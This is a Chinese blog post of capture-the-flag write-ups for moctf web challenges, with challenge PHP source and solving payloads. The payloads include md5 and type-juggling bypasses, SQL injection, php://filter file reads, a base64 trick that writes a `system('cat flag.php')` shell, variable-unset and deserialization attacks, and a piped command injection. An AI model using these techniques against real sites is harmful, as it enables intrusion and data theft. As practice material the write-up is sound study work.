<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="web,ctf,">










<meta name="description" content="一个暴力膜法的平台，我tm被锤爆【跪">
<meta name="keywords" content="web,ctf">
<meta property="og:type" content="article">
<meta property="og:title" content="moctf web wp">
<meta property="og:url" content="http://yoursite.com/2019/02/14/moctf-web-wp/index.html">
<meta property="og:site_name" content="shifeng_kazeの家">
<meta property="og:description" content="一个暴力膜法的平台，我tm被锤爆【跪">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/moctf_web_wp/4d68424c2eae7120edbc107785a4d81a.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/moctf_web_wp/d216aa3a212c1c84786f9ff580e394c8.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/moctf_web_wp/2d577c2db1acc66d4edf433333c9030f.png">
<meta property="og:updated_time" content="2019-02-14T13:55:03.664Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="moctf web wp">
<meta name="twitter:description" content="一个暴力膜法的平台，我tm被锤爆【跪">
<meta name="twitter:image" content="http://shifeng-kaze.cn/blog/moctf_web_wp/4d68424c2eae7120edbc107785a4d81a.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/02/14/moctf-web-wp/">





  <title>moctf web wp | shifeng_kazeの家</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">shifeng_kazeの家</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/02/14/moctf-web-wp/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="shifeng_kaze">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="http://shifeng-kaze.cn/blog/head/kotori.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="shifeng_kazeの家">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">moctf web wp</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-02-14T21:34:15+08:00">
                2019-02-14
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>一个暴力膜法的平台，我tm被锤爆【跪</p>
<a id="more"></a>
<h2 id="一道水题"><a href="#一道水题" class="headerlink" title="一道水题"></a>一道水题</h2><p>F12解决</p>
<h2 id="还是水题"><a href="#还是水题" class="headerlink" title="还是水题"></a>还是水题</h2><p>F12，改一下长度限制和输入限制即可</p>
<h2 id="访问限制"><a href="#访问限制" class="headerlink" title="访问限制"></a>访问限制</h2><p>年轻人不要太暴力hhh<br>抓包修改user-agent为NAIVE得到flag</p>
<h2 id="机器蛇"><a href="#机器蛇" class="headerlink" title="机器蛇"></a>机器蛇</h2><p>叫机器蛇，那应该和robots.txt有关。访问一下给出一个有flag的php，再访问F12获得flag</p>
<h2 id="PHP黑魔法"><a href="#PHP黑魔法" class="headerlink" title="PHP黑魔法"></a>PHP黑魔法</h2><p>提示有源码就试试看.php~，F12看到源码</p>
<p>读一下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">html lang=&quot;zh-CN&quot;&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot; /&gt; </span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">	$flag=&quot;moctf&#123;**************&#125;&quot;;</span><br><span class="line">	</span><br><span class="line">	if (isset($_GET[&apos;a&apos;])&amp;&amp;isset($_GET[&apos;b&apos;])) &#123;</span><br><span class="line">		$a=$_GET[&apos;a&apos;];</span><br><span class="line">		$b=$_GET[&apos;b&apos;];</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">		if($a==$b) </span><br><span class="line">		&#123;</span><br><span class="line">			echo &quot;&lt;center&gt;Wrong Answer!&lt;/center&gt;&quot;;</span><br><span class="line">		&#125;</span><br><span class="line">		else &#123;</span><br><span class="line">			if(md5($a)==md5($b)) </span><br><span class="line">			&#123;</span><br><span class="line">				echo &quot;&lt;center&gt;&quot;.$flag.&quot;&lt;/center&gt;&quot;; </span><br><span class="line">				echo &quot;By:daoyuan&quot;;</span><br><span class="line">			&#125;</span><br><span class="line">			else echo &quot;&lt;center&gt;Wrong Answer!&lt;/center&gt;&quot;;</span><br><span class="line">		&#125;</span><br><span class="line">		</span><br><span class="line">	&#125;</span><br><span class="line">	else echo &quot;&lt;center&gt;濂藉儚灏戜簡鐐逛粈涔�&lt;/center&gt;&quot;; </span><br><span class="line">?&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html</span><br></pre></td></tr></table></figure>
<p>md5的绕过</p>
<p>payload： <code>?a[]=1&amp;b[]=2</code></p>
<h2 id="我想要钱"><a href="#我想要钱" class="headerlink" title="我想要钱"></a>我想要钱</h2><p>审计题，读一下源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    include &quot;flag.php&quot;;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line"></span><br><span class="line">    if (isset($_GET[&apos;money&apos;])) &#123;</span><br><span class="line">        $money=$_GET[&apos;money&apos;];</span><br><span class="line">        if(strlen($money)&lt;=4&amp;&amp;$money&gt;time()&amp;&amp;!is_array($money))</span><br><span class="line">        &#123;</span><br><span class="line">            echo $flag;</span><br><span class="line">            echo &quot;&lt;!--By:daoyuan--&gt;&quot;;</span><br><span class="line">        &#125;</span><br><span class="line">        else echo &quot;Wrong Answer!&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">    else echo &quot;Wrong Answer!&quot;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>长度不能超过4且要大于现在时间<br>那就直接上科学计数法</p>
<p>payload： <code>?money=9e99</code></p>
<h2 id="登录就对了"><a href="#登录就对了" class="headerlink" title="登录就对了"></a>登录就对了</h2><p>不知道为什么用-1’or ‘1’=’1不行，admin’#就ok，神奇…</p>
<h2 id="文件包含"><a href="#文件包含" class="headerlink" title="文件包含"></a>文件包含</h2><p>F12发现flag.php，直接读不行，那就用php://filter来读</p>
<p>payload：<br><code>?file=php://filter/read=convert.base64-encode/resource=flag.php</code></p>
<p>base64解码得flag</p>
<h2 id="暴跳老板"><a href="#暴跳老板" class="headerlink" title="暴跳老板"></a>暴跳老板</h2><p>这题有点难受，找了好久才发现http头里有个Dear: MyBoss</p>
<p>于是就<br>payload： <code>Dear=MyBoss</code></p>
<h2 id="Flag在哪？"><a href="#Flag在哪？" class="headerlink" title="Flag在哪？"></a>Flag在哪？</h2><p>还以为抓包就ok了，每想到要各种跳转，然后跳到最后还是没有flag。于是记录一下url</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">flag.php	</span><br><span class="line">where_is_flag.php	</span><br><span class="line">I_have_a_frog.php	</span><br><span class="line">I_have_a_flag.php </span><br><span class="line">no_flag.php</span><br></pre></td></tr></table></figure>
<p>于是猜测存在frogflag.php，访问得到flag</p>
<h2 id="美味的饼干"><a href="#美味的饼干" class="headerlink" title="美味的饼干"></a>美味的饼干</h2><p>看题目应该是cookie<br>于是抓包发现一串base64，解码后是 <code>ee11cbb19052e40b07aac0ca060c23ee</code> 。再试base64解码发现不对，于是尝试md5解码，解出是user。于是用md5加密admin，再用base64加密，修改cookie提交得到flag</p>
<h2 id="没时间解释了"><a href="#没时间解释了" class="headerlink" title="没时间解释了"></a>没时间解释了</h2><p>应该是抓包或者脚本题</p>
<p>点进去发现url是index2.php，改成index.php依旧跳到index2.php。于是访问index.php抓包，发现提示uploadsomething.php</p>
<p>访问一下</p>
<p><img src="http://shifeng-kaze.cn/blog/moctf_web_wp/4d68424c2eae7120edbc107785a4d81a.png" alt=""></p>
<p>然后随便提交点东西</p>
<p><img src="http://shifeng-kaze.cn/blog/moctf_web_wp/d216aa3a212c1c84786f9ff580e394c8.png" alt=""></p>
<p>再访问</p>
<p><img src="http://shifeng-kaze.cn/blog/moctf_web_wp/2d577c2db1acc66d4edf433333c9030f.png" alt=""></p>
<p>提示太慢，于是写脚本，但发现一个脚本还是太慢，于是分成两个</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line"></span><br><span class="line">url=&quot;http://119.23.73.3:5006/web2/uploads/06788de737d4d4bbec18e277dcdf6e829121fb00/flag.php&quot;</span><br><span class="line">while 1:</span><br><span class="line">	print(requests.get(url).text)</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line"></span><br><span class="line">url=&quot;http://119.23.73.3:5006/web2/uploadsomething.php?filename=flag.php&amp;content=a&quot;</span><br><span class="line">while 1:</span><br><span class="line">	requests.get(url)</span><br></pre></td></tr></table></figure>
<p>同时运行跑出flag</p>
<h2 id="死亡退出"><a href="#死亡退出" class="headerlink" title="死亡退出"></a>死亡退出</h2><p>这题跪了orz</p>
<p>进去就是源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">	show_source(__FILE__);</span><br><span class="line">	$c=&quot;&lt;?php exit;?&gt;&quot;;</span><br><span class="line">	@$c.=$_POST[&apos;c&apos;];</span><br><span class="line">	@$filename=$_POST[&apos;file&apos;]; </span><br><span class="line">	if(!isset($filename))                    </span><br><span class="line">	&#123;                                       </span><br><span class="line">		file_put_contents(&apos;tmp.php&apos;, &apos;&apos;); </span><br><span class="line">	&#125;                                 </span><br><span class="line">	@file_put_contents($filename, $c);</span><br><span class="line">	include(&apos;tmp.php&apos;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>就是把传入的c接在 <code>&lt;?php exit;?&gt;</code> 后，然后写入传入的file的文件中。最后读取tmp.php</p>
<p>想了好久没想出，查wp，发现是用伪协议php://filter做<br><code>php://filter/write=convert.base64-decode/resource=</code> 这个可以将文件读取再base64解码后写入，而再这题就是接上c的值然后解码写入<br>但我们知道base64是以4字节接一个码，同时只会解码那些属于base64的字符。在 <code>&lt;?php exit;?&gt;</code> 中只有phpexit是，于是我们要给它加一个字符使得能解码。然后用 <code>&lt;?php system(&#39;cat flag.php&#39;);?&gt;</code> 的base64加密后的值来读取flag</p>
<p>于是payload:<br><code>File=php://filter/write=convert.base64-decode/resource=tmp.php&amp;c=kPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==</code></p>
<p>F12查源码得到flag</p>
<h2 id="火眼金睛"><a href="#火眼金睛" class="headerlink" title="火眼金睛"></a>火眼金睛</h2><p>脚本题</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import re</span><br><span class="line"></span><br><span class="line">url_1 = r&apos;http://119.23.73.3:5001/web10/&apos;</span><br><span class="line">url_2 = r&apos;http://119.23.73.3:5001/web10/work.php&apos;</span><br><span class="line"></span><br><span class="line">http = requests.get(url_1)</span><br><span class="line">content = http.content</span><br><span class="line">Set_Cookie = http.headers[&apos;Set-Cookie&apos;]</span><br><span class="line">PHPSESSID = re.findall(r&quot;PHPSESSID=(.*?);&quot;,Set_Cookie)[0]</span><br><span class="line">textarea = re.findall(r&quot;&lt;textarea rows = &apos;30&apos; cols = &apos;100&apos;&gt;(.*?)&lt;/textarea&gt;&quot;,content)[0]</span><br><span class="line">answer = textarea.count(&quot;moctf&quot;)</span><br><span class="line">cookie = &#123;&apos;PHPSESSID&apos;: PHPSESSID&#125;</span><br><span class="line">data = &#123;&apos;answer&apos;: answer&#125;</span><br><span class="line">new_http = requests.post(url_2,cookies=cookie,data=data)</span><br><span class="line">print new_http.content</span><br></pre></td></tr></table></figure>
<p>写个脚本搞定</p>
<h2 id="unset"><a href="#unset" class="headerlink" title="unset"></a>unset</h2><p>直接给了源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">highlight_file(&apos;index.php&apos;);</span><br><span class="line">function waf($a)&#123;</span><br><span class="line">foreach($a as $key =&gt; $value)&#123;</span><br><span class="line">        if(preg_match(&apos;/flag/i&apos;,$key))&#123;</span><br><span class="line">        exit(&apos;are you a hacker&apos;);</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line">foreach(array(&apos;_POST&apos;, &apos;_GET&apos;, &apos;_COOKIE&apos;) as $__R) &#123;</span><br><span class="line">        if($$__R) &#123; </span><br><span class="line">        foreach($$__R as $__k =&gt; $__v) &#123; </span><br><span class="line">            if(isset($$__k) &amp;&amp; $$__k == $__v) unset($$__k); </span><br><span class="line">        &#125;</span><br><span class="line">     &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line">if($_POST) &#123; waf($_POST);&#125;</span><br><span class="line">if($_GET) &#123; waf($_GET); &#125;</span><br><span class="line">if($_COOKIE) &#123; waf($_COOKIE);&#125;</span><br><span class="line"></span><br><span class="line">if($_POST) extract($_POST, EXTR_SKIP);</span><br><span class="line">if($_GET) extract($_GET, EXTR_SKIP);</span><br><span class="line">if(isset($_GET[&apos;flag&apos;]))&#123;</span><br><span class="line">if($_GET[&apos;flag&apos;] === $_GET[&apos;daiker&apos;])&#123;</span><br><span class="line">        exit(&apos;error&apos;);</span><br><span class="line">&#125;</span><br><span class="line">if(md5($_GET[&apos;flag&apos;] ) == md5($_GET[&apos;daiker&apos;]))&#123;</span><br><span class="line">        include($_GET[&apos;file&apos;]);</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>这题一开始没反应到unset的作用，在变量覆盖各种失败后才发现有EXTR_SKIP设置的是不能覆盖已有变量的。于是就想办法把$_GET给unset掉。简单的在cookie中设个_GET变量就能unset掉</p>
<p>payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">GET:?a=1</span><br><span class="line">POST:_GET[flag]=s878926199a&amp;_GET[daiker]=s155964671a&amp;_GET[file]=php://filter/read=convert.base64-encode/resource=flag.php</span><br><span class="line">Cookie:_GET[a]=1</span><br></pre></td></tr></table></figure>
<p>一开始file那里没反应过来要base64读取，搞了好久没搞定才想起include()要用php://filter。还有GET那里要设个变量，可以试试看输出_GET和Cookie传_GET[]=，两个的值是不一样的orz</p>
<p>最后解码一下就ok了</p>
<h2 id="PUBG"><a href="#PUBG" class="headerlink" title="PUBG"></a>PUBG</h2><p>进去试一下没搞到什么，就扫一下后台发现bak文件，下载下来读源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;title&gt;MOCTF吃鸡大赛&lt;/title&gt;</span><br><span class="line">&lt;style type=&quot;text/css&quot;&gt; </span><br><span class="line">a&#123; </span><br><span class="line">    text-decoration:none;</span><br><span class="line">    color:white;</span><br><span class="line">&#125; </span><br><span class="line">body</span><br><span class="line">&#123;</span><br><span class="line">    background:url(&apos;image/PUBG.jpg&apos;);</span><br><span class="line">    background-attachment:fixed;</span><br><span class="line">    background-repeat:no-repeat;</span><br><span class="line">    background-size:cover;</span><br><span class="line">    -moz-background-size:cover;</span><br><span class="line">    -webkit-background-size:cover;</span><br><span class="line">&#125;</span><br><span class="line">center</span><br><span class="line">&#123;</span><br><span class="line">    color:white;</span><br><span class="line">&#125;</span><br><span class="line">&lt;/style&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;center&gt;</span><br><span class="line">&lt;p&gt;你现在正在飞机上,请选择要跳的地方&lt;/p&gt;&lt;/br&gt;</span><br><span class="line">&lt;p&gt;&lt;a href=&quot;?LandIn=airport&quot;&gt;机场&lt;/a&gt;&lt;/p&gt;</span><br><span class="line">&lt;p&gt;&lt;a href=&quot;?LandIn=school&quot;&gt;学校&lt;/a&gt;&lt;/p&gt;</span><br><span class="line">&lt;p&gt;&lt;a href=&quot;?LandIn=field&quot;&gt;打野&lt;/a&gt;&lt;/p&gt;</span><br><span class="line">&lt;p&gt;&lt;a href=&quot;?LandIn=AFK&quot;&gt;上个厕所&lt;/a&gt;&lt;/p&gt;</span><br><span class="line">&lt;/center&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">    error_reporting(0);</span><br><span class="line">    include &apos;class.php&apos;;</span><br><span class="line">    if(is_array($_GET)&amp;&amp;count($_GET)&gt;0)</span><br><span class="line">    &#123;</span><br><span class="line">        if(isset($_GET[&quot;LandIn&quot;]))</span><br><span class="line">        &#123;</span><br><span class="line">            $pos=$_GET[&quot;LandIn&quot;];</span><br><span class="line">        &#125;</span><br><span class="line">        if($pos===&quot;airport&quot;)</span><br><span class="line">        &#123;</span><br><span class="line">            die(&quot;&lt;center&gt;机场大仙太多,你被打死了~&lt;/center&gt;&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">        elseif($pos===&quot;school&quot;)</span><br><span class="line">        &#123;</span><br><span class="line">            echo(&apos;&lt;/br&gt;&lt;center&gt;&lt;a href=&quot;/index.html&quot;  style=&quot;color:white&quot;&gt;叫我校霸~~&lt;/a&gt;&lt;/center&gt;&apos;);</span><br><span class="line">            $pubg=$_GET[&apos;pubg&apos;];</span><br><span class="line">            $p = unserialize($pubg);</span><br><span class="line">            // $p-&gt;Get_air_drops($p-&gt;weapon,$p-&gt;bag);</span><br><span class="line">        &#125;</span><br><span class="line">        elseif($pos===&quot;AFK&quot;)</span><br><span class="line">        &#123;</span><br><span class="line">            die(&quot;&lt;center&gt;由于你长时间没动,掉到海里淹死了~&lt;/center&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">        else</span><br><span class="line">        &#123;</span><br><span class="line">            die(&quot;&lt;center&gt;You Lose&lt;/center&gt;&quot;);</span><br><span class="line">            </span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>当pos为school时会对pubg参数进行反序列化<br>而这个文件只引入了class.php，于是尝试一下class.php.bak，又获得源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    include &apos;waf.php&apos;;</span><br><span class="line">    class sheldon&#123;</span><br><span class="line">        public $bag=&quot;nothing&quot;;</span><br><span class="line">        public $weapon=&quot;M24&quot;;</span><br><span class="line">        // public function __toString()&#123;</span><br><span class="line">        //     $this-&gt;str=&quot;You got the airdrop&quot;;</span><br><span class="line">        //     return $this-&gt;str;</span><br><span class="line">        // &#125;</span><br><span class="line">        public function __wakeup()</span><br><span class="line">        &#123;</span><br><span class="line">            $this-&gt;bag=&quot;nothing&quot;;</span><br><span class="line">            $this-&gt;weapon=&quot;kar98K&quot;;</span><br><span class="line">        &#125;</span><br><span class="line">        public function Get_air_drops($b)</span><br><span class="line">        &#123;</span><br><span class="line">                $this-&gt;$b();</span><br><span class="line">        &#125;</span><br><span class="line">        public function __call($method,$parameters)</span><br><span class="line">        &#123;</span><br><span class="line">            $file = explode(&quot;.&quot;,$method);</span><br><span class="line">            echo $file[0];</span><br><span class="line">            if(file_exists(&quot;.//class$file[0].php&quot;))</span><br><span class="line">            &#123;</span><br><span class="line">                system(&quot;php  .//class//$method.php&quot;);</span><br><span class="line">            &#125;</span><br><span class="line">            else</span><br><span class="line">            &#123;</span><br><span class="line">                system(&quot;php  .//class//win.php&quot;);</span><br><span class="line">            &#125;</span><br><span class="line">            die();</span><br><span class="line">        &#125;</span><br><span class="line">        public function nothing()</span><br><span class="line">        &#123;</span><br><span class="line">            die(&quot;&lt;center&gt;You lose&lt;/center&gt;&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">        public function __destruct()</span><br><span class="line">        &#123;</span><br><span class="line">            waf($this-&gt;bag);</span><br><span class="line">            if($this-&gt;weapon===&apos;AWM&apos;)</span><br><span class="line">            &#123;</span><br><span class="line">                $this-&gt;Get_air_drops($this-&gt;bag);</span><br><span class="line">            &#125;</span><br><span class="line">            else</span><br><span class="line">            &#123;</span><br><span class="line">                die(&apos;&lt;center&gt;The Air Drop is empty,you lose~&lt;/center&gt;&apos;);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>读一下，<strong>wakeup()这里不知怎么绕开，查了一下知道，但要反序列化的字符串处时属性数量与给的值不一样时，就会导致反序列化失败</strong>wakeup()不执行</p>
<p>然后__call()中要当./class$file[0].php存在时才会执行命令php  ./class/$method.php<br>又可以看到下面不存在时有个win.php，于是就可以认为class/win.php是存在的，于是使$method=/win.php|cat class/flag就可以了</p>
